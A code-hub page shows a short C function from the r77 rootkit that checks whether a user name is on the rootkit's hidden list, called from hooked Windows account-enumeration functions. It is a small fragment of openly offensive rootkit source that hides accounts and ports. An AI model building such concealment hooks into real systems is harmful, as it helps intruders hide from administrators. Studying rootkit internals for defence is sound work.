Code
Hub
Workspaces
Following
Trending
Connect
MCP
copy
Create free account
hub
/
github.com/bytecode77/r77-rootkit
/ IsUserNameHidden
Function
IsUserNameHidden
r77/Config.c:90–93 ·
view source on GitHub ↗
Source
from the content-addressed store, hash-verified
88
return Configuration && IntegerListContains(Configuration->HiddenUdpPorts, port);
89
}
90
BOOL IsUserNameHidden(LPCWSTR name)
91
{
92
return Configuration && StringListContains(Configuration->HiddenUserNames, name);
93
}
Callers
2
HookedSamEnumerateUsersInDomain
Function · 0.85
HookedSamQueryDisplayInformation
Function · 0.85
Calls
1
StringListContains
Function · 0.85
Tested by
no test coverage detected